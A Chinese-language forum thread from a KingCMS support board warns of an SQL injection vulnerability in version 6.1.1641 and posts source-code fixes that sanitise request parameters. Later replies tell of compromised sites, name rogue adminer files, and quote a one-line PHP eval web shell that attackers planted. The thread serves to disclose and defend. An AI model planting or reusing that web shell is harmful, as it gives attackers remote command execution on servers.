K9 通用版 博客版 主题版 地方门户版 企业版 |   企业(ASP) 分类 使用 分享 疑问 模板 建议 帮助 错误 其他
+新建主题 [Ajax]
填写帐号密码即可完成注册
+新建话题 最新回复排序 最新主题排序 精华帖子

提醒KingCMS PHP 6.1.1641重大漏洞,我已中招

1234Next >

leedon 发表于:13-08-21 10:28 编辑于:08-21 16:30 [添加收藏] 楼主 [回复] #Top#
leedon 人气:97 积分:456 金币:3731

KingCms 6.1.1641 SQL注入漏洞

6.1.1641版本中存在SQL注入漏洞,攻击者可以利用该漏洞,执行恶意SQL语句。属于“高危”级别安全漏洞,黑客可以通过这些漏洞,直接在网站上执行任意代码,控制网站及系统,最终导致“挂马”、“脱库”、“植入非法SEO链接”等

我的服务器通过kingcms漏洞旁蛀到整个服务器其他网站,上传了几十万条SEO垃圾外链。主站受到严重影响。

希望官方引起重视。

解决办法

1、打开文件/system/lib/kc_template_class.php,找到如下代码:

  case 'get':
    $s=kc_get($name,0); 
    $validate=kc_val($attrib,'validate');
替换为

 case 'get':
  $s=htmlspecialchars(kc_get($name,0));
  $validate=kc_val($attrib,'validate');

2、打开文件search.php代码,找到如下代码(注意:代码共有两处,都要替换):

 
$modelid=isset($_GET['modelid']) ? $_GET['modelid'] : $currentArray['modelid'];
替换为

 $modelid=isset($_GET['modelid']) ? intval($_GET['modelid']) : $currentArray['modelid'];

PS:感谢提供,已制成补丁包以附件形式上传。【点击下载

勾股定理 发表于:13-08-21 10:40 沙发 [回复] #Top#
勾股定理 人气:3 积分:15 金币:136
很感谢您的分享....赶紧修复...
wuchunkai 发表于:13-08-21 12:24 板凳 [回复] #Top#
wuchunkai 人气:472 积分:3 金币:19338
VIP KC元老 灌水狂人
我的也中招了。
催命判官 发表于:13-08-21 16:13 编辑于:08-21 16:31 4楼 [回复] #Top#
催命判官 人气:495 积分:3020 金币:26497
VIP 管理团队
感谢提供,请各位参考修改。
补丁我已经补充到楼主的帖子尾部。
另外,网站上的下载包已经更新。
leedon 发表于:13-08-22 09:55 5楼 [回复] #Top#
leedon 人气:97 积分:456 金币:3731
请大家打好补丁,并搜索一下 ,adminer.php,adminer.asp 这个2个文件。他们可以获得服务器最高权限,想干啥都行。我的现在都还没清理干净
killhook 发表于:13-08-22 11:32 6楼 [回复] #Top#
killhook 人气:30 积分:44 金币:738
非常感谢
toymen 发表于:13-08-22 22:27 编辑于:08-22 22:30 7楼 [回复] #Top#
toymen 人气:518 积分:3458 金币:23864
KC元老
真幸运,中招了,被人植入这个:

<?php @eval($_POST['cmd']);?>


wuchunkai 发表于:13-08-23 10:10 8楼 [回复] #Top#
wuchunkai 人气:472 积分:3 金币:19338
VIP KC元老 灌水狂人
估计不少人中招
qidaimaoxian 发表于:13-08-23 10:54 9楼 [回复] #Top#
qidaimaoxian 人气:0 积分:2 金币:0
非常感谢
yadajixi 发表于:13-08-23 14:46 10楼 [回复] #Top#
yadajixi 人气:10 积分:77 金币:500
VIP
灰常感谢呀!

1234Next >

发表回复

帐号 匿名发布 审核后可见 [加载完整在线编辑器]
内容
验证码
KingCMS 内容管理系统

关于我们 联系我们 广告报价 付款方式 站点导航

Copyright © 2004-2015 Focuznet All rights reserved.

广州唯众网络科技有限公司 粤ICP备08008106号